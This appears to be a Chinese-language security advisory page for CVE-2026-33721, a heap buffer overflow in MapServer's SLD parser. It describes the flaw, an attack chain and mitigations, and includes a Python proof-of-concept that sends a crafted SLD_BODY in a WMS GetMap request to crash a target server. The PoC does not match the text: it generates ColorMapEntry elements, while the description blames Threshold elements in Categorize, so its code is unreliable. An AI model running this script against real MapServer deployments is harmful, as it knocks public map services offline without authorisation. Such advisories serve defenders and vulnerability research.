CVE-2026-33721 CVSS 5.3 中危

MapServer SLD解析器堆缓冲区溢出漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33721

漏洞类型

堆缓冲区溢出

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MapServer

漏洞概述

MapServer是一个用于开发基于Web的GIS应用程序的系统。在4.2版本至8.6.1之前的版本中，其SLD（样式图层描述符）解析器存在堆缓冲区溢出写入漏洞。未经身份认证的远程攻击者可以通过发送包含ColorMap/Categorize结构中超过100个Threshold元素的特制SLD请求（通常通过WMS GetMap的SLD_BODY参数），导致MapServer进程崩溃，从而引发拒绝服务。

技术细节

该漏洞源于MapServer在解析SLD文档时，对ColorMap或Categorize结构内部的Threshold元素数量缺乏严格的限制。当解析器处理超过100个此类元素时，会触发堆缓冲区溢出写入。攻击者无需用户交互或身份认证，只需构造一个恶意的WMS GetMap请求，并在SLD_BODY参数中嵌入包含大量Threshold元素的XML数据。由于校验缺失，程序在写入缓冲区时会覆盖相邻内存区域，最终导致服务进程异常终止（DoS）。虽然该漏洞主要影响可用性，但堆溢出在特定条件下理论上存在代码执行风险，目前主要表现为服务崩溃。

攻击链分析

STEP 1

侦察

攻击者扫描网络，发现暴露在互联网上的MapServer WMS服务端点。

STEP 2

构造Payload

攻击者编写包含ColorMap/Categorize结构的恶意SLD XML，其中嵌入超过100个Threshold元素以触发缓冲区溢出。

STEP 3

发送请求

攻击者向目标服务器发送WMS GetMap请求，通过SLD_BODY参数传递恶意数据。

STEP 4

触发漏洞

MapServer解析SLD时发生堆缓冲区溢出，导致进程崩溃或服务拒绝响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target-mapserver/cgi-bin/mapserv"

# Construct malicious SLD with > 100 Threshold elements
sld_body = """<?xml version="1.0" encoding="UTF-8"?>
<StyledLayerDescriptor version="1.0.0" xmlns="http://www.opengis.net/sld">
  <NamedLayer>
    <Name>LayerName</Name>
    <UserStyle>
      <FeatureTypeStyle>
        <Rule>
          <RasterSymbolizer>
            <ColorMap>
              <!-- Generate more than 100 thresholds -->
"""
for i in range(101):
    sld_body += f'      <ColorMapEntry color="#000000" quantity="{i}" />\n'

sld_body += """
            </ColorMap>
          </RasterSymbolizer>
        </Rule>
      </FeatureTypeStyle>
    </UserStyle>
  </NamedLayer>
</StyledLayerDescriptor>"""

# Send request via WMS GetMap
params = {
    "service": "WMS",
    "version": "1.1.0",
    "request": "GetMap",
    "layers": "LayerName",
    "styles": "",
    "srs": "EPSG:4326",
    "bbox": "-180,-90,180,90",
    "width": "800",
    "height": "600",
    "format": "image/png",
    "SLD_BODY": sld_body
}

try:
    response = requests.get(target_url, params=params, timeout=10)
    print(f"Status Code: {response.status_code}")
    if response.status_code == 500 or not response.content:
        print("Potential crash detected (Server Error or Empty Response).")
except requests.exceptions.RequestException as e:
    print(f"Connection failed (Likely DoS): {e}")

影响范围

MapServer 4.2 至 8.6.1 之前

防御指南

临时缓解措施

如果无法立即升级，建议在应用防火墙（WAF）中部署规则，拦截包含复杂ColorMap结构的SLD请求，或禁用通过SLD_BODY参数上传自定义样式的功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表